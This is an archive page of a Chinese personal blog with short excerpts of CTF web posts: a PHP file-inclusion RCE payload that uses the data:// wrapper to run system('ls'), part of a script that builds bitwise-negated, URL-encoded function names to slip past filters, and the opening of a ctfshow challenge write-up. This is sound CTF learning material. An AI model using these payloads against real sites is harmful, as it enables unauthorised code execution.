2023年4月

文件包含&rce

先说payload:?c=include$_GET[1]?>&1=data://text/plain,<?php system(“ls”);?>

前半段的?c=include$_GET[1]?>是为了和前面的形成闭合,这样在后面通过包含的1配合data伪协议进行传入参数,参数为一个执行[……]

继续阅读

rce取反脚本

<?php

$ans1=’system’;//函数名

$ans2=’ls’;//命令

data1=(‘~’.urlencode(~ans1));//通过两次取反运算得到system

data2=(‘~’.urlencode(~ans2));//通过两次取反运算得到dir[……]

继续阅读

ctfshow–愚人杯

web

easy_signin

题目打开是这样,很像buu上面的一道webdog,一眼base64.解密一下(face.png)

看看能不能读到源码,首先就是index.php加密(aW5kZXgucGhw)

那就看看源码

似乎又是base64,解码果然是这[……]

继续阅读

蜀ICP备2022010829号